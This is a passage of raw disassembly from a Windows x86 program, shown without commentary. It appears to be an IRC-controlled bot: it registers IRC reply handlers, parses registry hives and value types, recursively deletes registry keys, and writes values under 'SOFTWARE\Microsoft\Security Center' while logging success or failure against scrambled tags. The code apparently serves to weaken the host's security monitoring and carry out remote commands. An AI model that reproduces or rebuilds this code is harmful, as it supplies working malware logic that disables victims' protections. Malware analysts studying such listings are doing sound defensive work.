mov ecx, [esp+arg_8]
push eax
call sub_4110F4
xor eax, eax
retn
sub_41A1AB endp
; =============== S U B R O U T I N E =======================================
sub_41A1C5 proc near ; CODE XREF: sub_42A443+52�p
; DATA XREF: sub_41A1C8+7�o
xor eax, eax
retn
sub_41A1C5 endp
; =============== S U B R O U T I N E =======================================
sub_41A1C8 proc near ; CODE XREF: sub_412267+498�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
push offset sub_41A1C5
push offset aIQ ; "(I]q"
mov ecx, esi
call sub_40FC86
push offset sub_419B2F
push offset dword_43C078
mov ecx, esi
call sub_40FC86
push offset sub_419EE6
push offset dword_43C090
mov ecx, esi
call sub_40FC86
mov ebx, offset sub_419F6A
mov ecx, esi
push ebx
push offset dword_43C098
call sub_40FC86
mov edi, offset sub_4140F8
mov ecx, esi
push edi
push offset dword_43C0B0
call sub_40FC86
push edi
push offset a302 ; "302"
mov ecx, esi
call sub_40FC86
push ebx
push offset a332 ; "332"
mov ecx, esi
call sub_40FC86
push offset sub_41A15F
push offset a366 ; "366"
mov ecx, esi
call sub_40FC86
mov edi, offset sub_41A0E6
mov ecx, esi
push edi
push offset a005 ; "005"
call sub_40FC86
push edi
push offset a376 ; "376"
mov ecx, esi
call sub_40FC86
push edi
push offset a422 ; "422"
mov ecx, esi
call sub_40FC86
push offset sub_41A1AB
push offset a433 ; "433"
mov ecx, esi
call sub_40FC86
pop edi
pop esi
pop ebx
retn
sub_41A1C8 endp
; =============== S U B R O U T I N E =======================================
sub_41A292 proc near ; CODE XREF: sub_403B2C+FCD�p
; sub_403B2C+1086�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
push offset aHkey_local_mac ; "HKEY_LOCAL_MACHINE"
call sub_422760
pop ecx
test eax, eax
pop ecx
jz loc_41A369
push esi
push offset aHklm ; "HKLM"
call sub_422760
pop ecx
test eax, eax
pop ecx
jz loc_41A369
push esi
push offset aHkey_current_u ; "HKEY_CURRENT_USER"
call sub_422760
pop ecx
test eax, eax
pop ecx
jz loc_41A362
push esi
push offset aHkcu ; "HKCU"
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_41A362
push esi
push offset aHkey_classes_r ; "HKEY_CLASSES_ROOT"
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_41A35B
push esi
push offset aHkcr ; "HKCR"
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_41A35B
push esi
push offset aHkey_current_c ; "HKEY_CURRENT_CONFIG"
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_41A354
push esi
push offset aHkcc ; "HKCC"
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_41A354
push esi
push offset aHkey_users ; "HKEY_USERS"
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_41A34D
push esi
push offset off_442764
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_41A369
loc_41A34D: ; CODE XREF: sub_41A292+A8�j
mov eax, 80000003h
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A354: ; CODE XREF: sub_41A292+86�j
; sub_41A292+97�j
mov eax, 80000005h
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A35B: ; CODE XREF: sub_41A292+64�j
; sub_41A292+75�j
mov eax, 80000000h
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A362: ; CODE XREF: sub_41A292+3E�j
; sub_41A292+53�j
mov eax, 80000001h
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A369: ; CODE XREF: sub_41A292+14�j
; sub_41A292+29�j ...
mov eax, 80000002h
pop esi
retn
sub_41A292 endp
; =============== S U B R O U T I N E =======================================
sub_41A370 proc near ; CODE XREF: sub_403B2C:loc_408598�p
; sub_403B2C+4D2F�p
arg_0 = dword ptr 4
push esi
mov esi, dword_42F070
push edi
mov edi, [esp+8+arg_0]
push offset aReg_sz ; "REG_SZ"
push edi
call esi ; dword_42F070
test eax, eax
jz short loc_41A3E9
push offset aSz ; "SZ"
push edi
call esi ; dword_42F070
test eax, eax
jz short loc_41A3E9
push offset aReg_expand_sz ; "REG_EXPAND_SZ"
push edi
call esi ; dword_42F070
test eax, eax
jz short loc_41A3E5
push offset aEx ; "EX"
push edi
call esi ; dword_42F070
test eax, eax
jz short loc_41A3E5
push offset aReg_multi_sz ; "REG_MULTI_SZ"
push edi
call esi ; dword_42F070
test eax, eax
jz short loc_41A3E1
push offset aMu ; "MU"
push edi
call esi ; dword_42F070
test eax, eax
jz short loc_41A3E1
push offset aReg_dword ; "REG_DWORD"
push edi
call esi ; dword_42F070
test eax, eax
jz short loc_41A3DC
push offset aDw ; "DW"
push edi
call esi ; dword_42F070
test eax, eax
jnz short loc_41A3E9
loc_41A3DC: ; CODE XREF: sub_41A370+5E�j
push 4
loc_41A3DE: ; CODE XREF: sub_41A370+73�j
; sub_41A370+77�j
pop eax
jmp short loc_41A3EC
; ---------------------------------------------------------------------------
loc_41A3E1: ; CODE XREF: sub_41A370+46�j
; sub_41A370+52�j
push 7
jmp short loc_41A3DE
; ---------------------------------------------------------------------------
loc_41A3E5: ; CODE XREF: sub_41A370+2E�j
; sub_41A370+3A�j
push 2
jmp short loc_41A3DE
; ---------------------------------------------------------------------------
loc_41A3E9: ; CODE XREF: sub_41A370+16�j
; sub_41A370+22�j ...
xor eax, eax
inc eax
loc_41A3EC: ; CODE XREF: sub_41A370+6F�j
pop edi
pop esi
retn
sub_41A370 endp
; =============== S U B R O U T I N E =======================================
sub_41A3EF proc near ; CODE XREF: sub_41A60E+159�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 4
ja short loc_41A426
jz short loc_41A420
sub eax, 0
jz short loc_41A41A
dec eax
jz short loc_41A414
dec eax
jz short loc_41A40E
dec eax
jnz short loc_41A436
mov eax, offset aReg_binary ; "REG_BINARY"
retn
; ---------------------------------------------------------------------------
loc_41A40E: ; CODE XREF: sub_41A3EF+14�j
mov eax, offset aReg_expand_sz ; "REG_EXPAND_SZ"
retn
; ---------------------------------------------------------------------------
loc_41A414: ; CODE XREF: sub_41A3EF+11�j
mov eax, offset aReg_sz ; "REG_SZ"
retn
; ---------------------------------------------------------------------------
loc_41A41A: ; CODE XREF: sub_41A3EF+E�j
mov eax, offset aReg_none ; "REG_NONE"
retn
; ---------------------------------------------------------------------------
loc_41A420: ; CODE XREF: sub_41A3EF+9�j
mov eax, offset aReg_dword ; "REG_DWORD"
retn
; ---------------------------------------------------------------------------
loc_41A426: ; CODE XREF: sub_41A3EF+7�j
sub eax, 5
jz short loc_41A44E
dec eax
jz short loc_41A448
dec eax
jz short loc_41A442
sub eax, 4
jz short loc_41A43C
loc_41A436: ; CODE XREF: sub_41A3EF+17�j
mov eax, offset aUnknown_0 ; "UNKNOWN"
retn
; ---------------------------------------------------------------------------
loc_41A43C: ; CODE XREF: sub_41A3EF+45�j
mov eax, offset aReg_qword ; "REG_QWORD"
retn
; ---------------------------------------------------------------------------
loc_41A442: ; CODE XREF: sub_41A3EF+40�j
mov eax, offset aReg_multi_sz ; "REG_MULTI_SZ"
retn
; ---------------------------------------------------------------------------
loc_41A448: ; CODE XREF: sub_41A3EF+3D�j
mov eax, offset aReg_link ; "REG_LINK"
retn
; ---------------------------------------------------------------------------
loc_41A44E: ; CODE XREF: sub_41A3EF+3A�j
mov eax, offset aReg_dword_big_ ; "REG_DWORD_BIG_ENDIAN"
retn
sub_41A3EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A454 proc near ; CODE XREF: sub_403B2C+4953�p
; sub_412267+AD�p ...
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
xor ebx, ebx
cmp [ebp+arg_4], ebx
push esi
push edi
mov [ebp+var_4], ebx
jz loc_41A573
cmp [ebp+arg_8], ebx
jnz loc_41A535
push [ebp+arg_4]
push [ebp+arg_0]
call dword_45428C ; RegDeleteKeyA
test eax, eax
jz loc_41A568
push 3Fh
xor eax, eax
pop ecx
lea edi, [ebp+var_10B]
mov [ebp+var_10C], bl
xor esi, esi
rep stosd
stosw
stosb
lea eax, [ebp+var_4]
mov [ebp+arg_8], 100h
push eax
push 2001Fh
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_454384 ; RegOpenKeyExA
test eax, eax
jnz loc_41A573
lea eax, [ebp+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+arg_8]
push ebx
push eax
lea eax, [ebp+var_10C]
push eax
push ebx
push [ebp+var_4]
call dword_454264 ; RegEnumKeyExA
mov edi, 103h
jmp short loc_41A523
; ---------------------------------------------------------------------------
loc_41A4EB: ; CODE XREF: sub_41A454+D1�j
cmp eax, ebx
jnz short loc_41A527
lea eax, [ebp+var_10C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41A454
add esp, 0Ch
lea ecx, [ebp+var_C]
mov eax, esi
inc esi
push ecx
push ebx
push ebx
lea ecx, [ebp+arg_8]
push ebx
push ecx
lea ecx, [ebp+var_10C]
push ecx
push eax
push [ebp+var_4]
call dword_454264 ; RegEnumKeyExA
loc_41A523: ; CODE XREF: sub_41A454+95�j
cmp eax, edi
jnz short loc_41A4EB
loc_41A527: ; CODE XREF: sub_41A454+99�j
push [ebp+arg_4]
push [ebp+var_4]
call dword_45428C ; RegDeleteKeyA
jmp short loc_41A573
; ---------------------------------------------------------------------------
loc_41A535: ; CODE XREF: sub_41A454+1D�j
lea eax, [ebp+var_4]
push eax
push 2001Fh
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_454384 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A573
push [ebp+arg_8]
push [ebp+var_4]
call dword_454260 ; RegDeleteValueA
push [ebp+var_4]
test eax, eax
jnz short loc_41A56D
call dword_4542E8 ; RegCloseKey
loc_41A568: ; CODE XREF: sub_41A454+31�j
xor eax, eax
inc eax
jmp short loc_41A575
; ---------------------------------------------------------------------------
loc_41A56D: ; CODE XREF: sub_41A454+10C�j
call dword_4542E8 ; RegCloseKey
loc_41A573: ; CODE XREF: sub_41A454+14�j
; sub_41A454+6E�j ...
xor eax, eax
loc_41A575: ; CODE XREF: sub_41A454+117�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A454 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A57A proc near ; CODE XREF: sub_41FB50+F3�p
; sub_41FB50+108�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
cmp edi, esi
mov [ebp+var_4], esi
jz short loc_41A608
cmp [ebp+arg_8], esi
jz short loc_41A608
lea eax, [ebp+var_4]
push eax
push 2001Fh
push esi
push edi
push [ebp+arg_0]
call dword_454384 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A604
mov eax, [ebp+arg_C]
cmp eax, 4
jnz short loc_41A5D3
lea eax, [ebp+arg_4]
mov [ebp+arg_4], esi
push eax
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_41A60E
add esp, 10h
xor eax, eax
cmp [ebp+arg_4], esi
setnz al
mov esi, eax
jmp short loc_41A5FB
; ---------------------------------------------------------------------------
loc_41A5D3: ; CODE XREF: sub_41A57A+35�j
cmp eax, 1
jz short loc_41A5E2
cmp eax, 2
jz short loc_41A5E2
cmp eax, 7
jnz short loc_41A5FB
loc_41A5E2: ; CODE XREF: sub_41A57A+5C�j
; sub_41A57A+61�j
push 1
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_41A829
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
neg esi
loc_41A5FB: ; CODE XREF: sub_41A57A+57�j
; sub_41A57A+66�j
push [ebp+var_4]
call dword_4542E8 ; RegCloseKey
loc_41A604: ; CODE XREF: sub_41A57A+2D�j
mov eax, esi
jmp short loc_41A60A
; ---------------------------------------------------------------------------
loc_41A608: ; CODE XREF: sub_41A57A+10�j
; sub_41A57A+15�j
xor eax, eax
loc_41A60A: ; CODE XREF: sub_41A57A+8C�j
pop edi
pop esi
leave
retn
sub_41A57A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A60E proc near ; CODE XREF: sub_403B2C+4A2D�p
; sub_41A57A+45�p
var_224 = byte ptr -224h
var_124 = byte ptr -124h
var_A4 = byte ptr -0A4h
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 224h
push ebx
lea eax, [ebp+var_8]
push edi
xor ebx, ebx
push eax
push 0F003Fh
push ebx
mov edi, 0FFh
push [ebp+arg_4]
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
mov [ebp+var_1C], edi
push [ebp+arg_0]
mov [ebp+var_14], 67h
mov [ebp+var_20], 80h
mov [ebp+var_4], ebx
call dword_454384 ; RegOpenKeyExA
test eax, eax
jnz loc_41A7AD
lea eax, [ebp+var_30]
push esi
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_20]
push ebx
push eax
lea eax, [ebp+var_124]
push eax
push [ebp+var_8]
call dword_4542B4 ; RegQueryInfoKeyA
cmp [ebp+var_C], ebx
mov [ebp+arg_0], ebx
jz short loc_41A6ED
xor esi, esi
cmp [ebp+var_C], ebx
jbe short loc_41A6ED
loc_41A69D: ; CODE XREF: sub_41A60E+DD�j
lea eax, [ebp+var_30]
mov [ebp+var_1C], edi
push eax
push ebx
push ebx
lea eax, [ebp+var_1C]
push ebx
push eax
lea eax, [ebp+var_224]
push eax
push esi
push [ebp+var_8]
call dword_454264 ; RegEnumKeyExA
test eax, eax
jnz short loc_41A6E4
lea eax, [ebp+var_224]
push eax
lea eax, [esi+1]
push [ebp+arg_4]
push eax
push offset a_2dSS ; "(%.2d) %s\\%s"
push [ebp+arg_8]
push [ebp+arg_C]
call sub_4104F6
add esp, 18h
inc [ebp+var_4]
loc_41A6E4: ; CODE XREF: sub_41A60E+B0�j
inc esi
inc [ebp+arg_0]
cmp esi, [ebp+var_C]
jb short loc_41A69D
loc_41A6ED: ; CODE XREF: sub_41A60E+86�j
; sub_41A60E+8D�j
cmp [ebp+var_10], ebx
jz loc_41A799
xor edi, edi
cmp [ebp+var_10], ebx
jbe loc_41A799
mov eax, [ebp+arg_0]
lea esi, [eax+1]
loc_41A707: ; CODE XREF: sub_41A60E+185�j
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_A4]
push eax
push edi
push [ebp+var_8]
mov [ebp+var_14], 0FFh
mov [ebp+var_A4], bl
call dword_45420C ; RegEnumValueA
test eax, eax
jnz short loc_41A78E
lea eax, [ebp+var_A4]
push offset byte_44D6A4
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_41A764
cmp [ebp+var_18], 1
jnz short loc_41A764
lea eax, [ebp+var_A4]
push offset aDefault ; "(Default)"
push eax
call sub_422063
pop ecx
pop ecx
loc_41A764: ; CODE XREF: sub_41A60E+13B�j
; sub_41A60E+141�j
push [ebp+var_18]
call sub_41A3EF
push eax
lea eax, [ebp+var_A4]
push eax
push [ebp+arg_4]
push esi
push offset a_2dSSS ; "(%.2d) %s\\%s (%s)"
push [ebp+arg_8]
push [ebp+arg_C]
call sub_4104F6
add esp, 20h
inc [ebp+var_4]
loc_41A78E: ; CODE XREF: sub_41A60E+124�j
inc edi
inc esi
cmp edi, [ebp+var_10]
jb loc_41A707
loc_41A799: ; CODE XREF: sub_41A60E+E2�j
; sub_41A60E+ED�j
push [ebp+var_8]
call dword_4542E8 ; RegCloseKey
xor eax, eax
cmp [ebp+var_4], ebx
pop esi
setnle al
jmp short loc_41A7AF
; ---------------------------------------------------------------------------
loc_41A7AD: ; CODE XREF: sub_41A60E+44�j
xor eax, eax
loc_41A7AF: ; CODE XREF: sub_41A60E+19D�j
pop edi
pop ebx
leave
retn
sub_41A60E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A7B3 proc near ; CODE XREF: sub_403B2C+4B30�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push 4
pop eax
xor esi, esi
mov [ebp+var_10], eax
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
mov [ebp+var_4], esi
push eax
push 0F003Fh
push esi
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_454384 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A81F
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
push [ebp+arg_8]
push [ebp+var_4]
call dword_4541F8 ; RegQueryValueExA
push [ebp+var_4]
test eax, eax
jnz short loc_41A819
call dword_4542E8 ; RegCloseKey
mov eax, [ebp+arg_C]
mov dword ptr [eax], 1
mov eax, [ebp+var_8]
jmp short loc_41A826
; ---------------------------------------------------------------------------
loc_41A819: ; CODE XREF: sub_41A7B3+50�j
call dword_4542E8 ; RegCloseKey
loc_41A81F: ; CODE XREF: sub_41A7B3+30�j
mov eax, [ebp+arg_C]
mov [eax], esi
xor eax, eax
loc_41A826: ; CODE XREF: sub_41A7B3+64�j
pop esi
leave
retn
sub_41A7B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A829 proc near ; CODE XREF: sub_403B2C+4B90�p
; sub_412267+59�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov eax, 0FFFFh
push esi
xor ebx, ebx
push eax
mov esi, offset dword_45C3E0
push ebx
push esi
mov [ebp+var_4], ebx
mov [ebp+var_8], eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_454384 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A8CB
lea eax, [ebp+var_8]
push eax
push esi
push ebx
push ebx
push [ebp+arg_8]
push [ebp+var_4]
call dword_4541F8 ; RegQueryValueExA
test eax, eax
jnz short loc_41A8C2
cmp [ebp+arg_C], 7
jnz short loc_41A8B5
mov ecx, [ebp+var_8]
mov byte ptr dword_45C3E0[ecx], bl
loc_41A88D: ; CODE XREF: sub_41A829+72�j
cmp ecx, ebx
jz short loc_41A89D
dec ecx
mov [ebp+var_8], ecx
cmp byte ptr dword_45C3E0[ecx], bl
jz short loc_41A88D
loc_41A89D: ; CODE XREF: sub_41A829+66�j
xor edx, edx
cmp ecx, ebx
jbe short loc_41A8B5
loc_41A8A3: ; CODE XREF: sub_41A829+8A�j
lea eax, dword_45C3E0[edx]
cmp [eax], bl
jnz short loc_41A8B0
mov byte ptr [eax], 0Ah
loc_41A8B0: ; CODE XREF: sub_41A829+82�j
inc edx
cmp edx, ecx
jb short loc_41A8A3
loc_41A8B5: ; CODE XREF: sub_41A829+59�j
; sub_41A829+78�j
push [ebp+var_4]
call dword_4542E8 ; RegCloseKey
mov eax, esi
jmp short loc_41A8CD
; ---------------------------------------------------------------------------
loc_41A8C2: ; CODE XREF: sub_41A829+53�j
push [ebp+var_4]
call dword_4542E8 ; RegCloseKey
loc_41A8CB: ; CODE XREF: sub_41A829+3C�j
xor eax, eax
loc_41A8CD: ; CODE XREF: sub_41A829+97�j
pop esi
pop ebx
leave
retn
sub_41A829 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A8D1 proc near ; CODE XREF: sub_403B2C+4DFC�p
; sub_412267+1ED�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+var_4]
mov eax, [ebp+arg_C]
push eax
push 4
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41A939
add esp, 18h
leave
retn
sub_41A8D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A8F2 proc near ; CODE XREF: sub_403B2C+4ED6�p
; sub_4120E9+116�p ...
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_10], 1
mov eax, [ebp+arg_C]
jnz short loc_41A919
push eax
push [ebp+var_8]
push 1
loc_41A906: ; CODE XREF: sub_41A8F2+33�j
; sub_41A8F2+41�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41A939
add esp, 18h
leave
retn
; ---------------------------------------------------------------------------
loc_41A919: ; CODE XREF: sub_41A8F2+C�j
cmp [ebp+arg_10], 2
jnz short loc_41A927
push eax
push [ebp+var_8]
push 2
jmp short loc_41A906
; ---------------------------------------------------------------------------
loc_41A927: ; CODE XREF: sub_41A8F2+2B�j
cmp [ebp+arg_10], 7
jnz short loc_41A935
push eax
push [ebp+var_8]
push 7
jmp short loc_41A906
; ---------------------------------------------------------------------------
loc_41A935: ; CODE XREF: sub_41A8F2+39�j
xor eax, eax
leave
retn
sub_41A8F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A939 proc near ; CODE XREF: sub_41A8D1+17�p
; sub_41A8F2+1D�p
var_10004 = byte ptr -10004h
var_10003 = byte ptr -10003h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_4220C0
push ebx
xor ebx, ebx
lea eax, [ebp+arg_4]
push ebx
push eax
push ebx
push 20006h
push ebx
push ebx
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4542BC ; RegCreateKeyExA
test eax, eax
jz short loc_41A96E
xor eax, eax
jmp loc_41AA3E
; ---------------------------------------------------------------------------
loc_41A96E: ; CODE XREF: sub_41A939+2C�j
push esi
push edi
mov edi, [ebp+arg_8]
cmp edi, ebx
jz loc_41AA2E
mov eax, [ebp+arg_C]
dec eax
jz loc_41AA41
dec eax
jz short loc_41A9F9
dec eax
dec eax
jz short loc_41A9E9
sub eax, 3
jnz loc_41AA31
push [ebp+arg_14]
call sub_422120
pop ecx
mov esi, eax
push [ebp+arg_14]
lea eax, [ebp+var_10004]
push eax
call dword_42F04C ; lstrcpyA
xor ecx, ecx
cmp esi, ebx
mov [ebp+esi+var_10004], bl
mov [ebp+esi+var_10003], bl
jle short loc_41A9D9
loc_41A9C4: ; CODE XREF: sub_41A939+9C�j
lea eax, [ebp+ecx+var_10004]
cmp byte ptr [eax], 0Ah
jnz short loc_41A9D2
mov [eax], bl
loc_41A9D2: ; CODE XREF: sub_41A939+95�j
inc ecx
cmp ecx, esi
jl short loc_41A9C4
cmp esi, ebx
loc_41A9D9: ; CODE XREF: sub_41A939+89�j
jz short loc_41A9DD
inc esi
inc esi
loc_41A9DD: ; CODE XREF: sub_41A939:loc_41A9D9�j
lea eax, [ebp+var_10004]
push esi
push eax
push 7
jmp short loc_41AA1F
; ---------------------------------------------------------------------------
loc_41A9E9: ; CODE XREF: sub_41A939+51�j
mov eax, [ebp+arg_10]
push 4
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push eax
push 4
jmp short loc_41AA1F
; ---------------------------------------------------------------------------
loc_41A9F9: ; CODE XREF: sub_41A939+4D�j
push [ebp+arg_14]
call sub_422120
pop ecx
mov esi, eax
push [ebp+arg_14]
lea eax, [ebp+var_10004]
push eax
call dword_42F04C ; lstrcpyA
inc esi
lea eax, [ebp+var_10004]
push esi
push eax
push 2
loc_41AA1F: ; CODE XREF: sub_41A939+AE�j
; sub_41A939+BE�j ...
push ebx
push edi
push [ebp+arg_4]
call dword_45433C ; RegSetValueExA
test eax, eax
jnz short loc_41AA31
loc_41AA2E: ; CODE XREF: sub_41A939+3C�j
xor ebx, ebx
inc ebx
loc_41AA31: ; CODE XREF: sub_41A939+56�j
; sub_41A939+F3�j
push [ebp+arg_4]
call dword_4542E8 ; RegCloseKey
pop edi
mov eax, ebx
pop esi
loc_41AA3E: ; CODE XREF: sub_41A939+30�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41AA41: ; CODE XREF: sub_41A939+46�j
push [ebp+arg_14]
call sub_422120
pop ecx
mov esi, eax
push [ebp+arg_14]
lea eax, [ebp+var_10004]
push eax
call dword_42F04C ; lstrcpyA
inc esi
lea eax, [ebp+var_10004]
push esi
push eax
push 1
jmp short loc_41AA1F
sub_41A939 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA69 proc near ; CODE XREF: sub_41B226+48�p
; sub_41B226+B6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor edx, edx
push esi
push edi
mov [ebp+var_8], edx
mov [ebp+var_4], edx
xor esi, esi
loc_41AA7B: ; CODE XREF: sub_41AA69+23E�j
mov eax, dword_442AD4[esi]
cmp eax, 4
jnz loc_41AB92
cmp [ebp+arg_0], edx
jz short loc_41AA97
mov eax, dword_442AD8[esi]
jmp short loc_41AA9D
; ---------------------------------------------------------------------------
loc_41AA97: ; CODE XREF: sub_41AA69+24�j
mov eax, dword_442ADC[esi]
loc_41AA9D: ; CODE XREF: sub_41AA69+2C�j
lea edi, dword_4429D3[esi]
lea ebx, aSoftwareMicr_5[esi] ; "SOFTWARE\\Microsoft\\Security Center"
push eax
push edi
push ebx
push dword_4428D0[esi]
call sub_41A8D1
add esp, 10h
test eax, eax
jz short loc_41AB28
inc [ebp+var_8]
cmp [ebp+arg_14], 0
jnz loc_41AC99
cmp [ebp+arg_10], 0
jz loc_41AC99
cmp [ebp+arg_C], 0
jnz loc_41AC99
cmp [ebp+arg_0], 0
jz short loc_41AAED
mov ecx, dword_442AD8[esi]
jmp short loc_41AAF3
; ---------------------------------------------------------------------------
loc_41AAED: ; CODE XREF: sub_41AA69+7A�j
mov ecx, dword_442ADC[esi]
loc_41AAF3: ; CODE XREF: sub_41AA69+82�j
cmp dword_4428D0[esi], 80000002h
mov edx, offset aHklm ; "HKLM"
jz short loc_41AB09
mov edx, offset aHkcu ; "HKCU"
loc_41AB09: ; CODE XREF: sub_41AA69+99�j
cmp [ebp+arg_0], 0
mov eax, offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
jnz short loc_41AB19
mov eax, offset aWxbrg_rpy8y_ty ; "wXBrG.Rpy8y.TY84s/myQpz0"
loc_41AB19: ; CODE XREF: sub_41AA69+A9�j
push ecx
push edi
push ebx
push edx
push eax
push offset aSSetSSSToD_ ; "%s Set \"%s\\%s\\%s\" to \"%d\"."
jmp loc_41AC8B
; ---------------------------------------------------------------------------
loc_41AB28: ; CODE XREF: sub_41AA69+53�j
inc [ebp+var_4]
cmp [ebp+arg_14], 0
jnz loc_41AC99
cmp [ebp+arg_10], 0
jz loc_41AC99
cmp [ebp+arg_C], 0
jnz loc_41AC99
cmp [ebp+arg_0], 0
jz short loc_41AB57
mov ecx, dword_442AD8[esi]
jmp short loc_41AB5D
; ---------------------------------------------------------------------------
loc_41AB57: ; CODE XREF: sub_41AA69+E4�j
mov ecx, dword_442ADC[esi]
loc_41AB5D: ; CODE XREF: sub_41AA69+EC�j
cmp dword_4428D0[esi], 80000002h
mov edx, offset aHklm ; "HKLM"
jz short loc_41AB73
mov edx, offset aHkcu ; "HKCU"
loc_41AB73: ; CODE XREF: sub_41AA69+103�j
cmp [ebp+arg_0], 0
mov eax, offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
jnz short loc_41AB83
mov eax, offset aWxbrg_rpy8y_ty ; "wXBrG.Rpy8y.TY84s/myQpz0"
loc_41AB83: ; CODE XREF: sub_41AA69+113�j
push ecx
push edi
push ebx
push edx
push eax
push offset aSFailedToSetSS ; "%s Failed to set \"%s\\%s\\%s\" to \"%d\"."
jmp loc_41AC8B
; ---------------------------------------------------------------------------
loc_41AB92: ; CODE XREF: sub_41AA69+1B�j
cmp eax, 1
jnz loc_41AC9B
inc [ebp+var_8]
cmp [ebp+arg_0], edx
lea eax, dword_442AE0[esi]
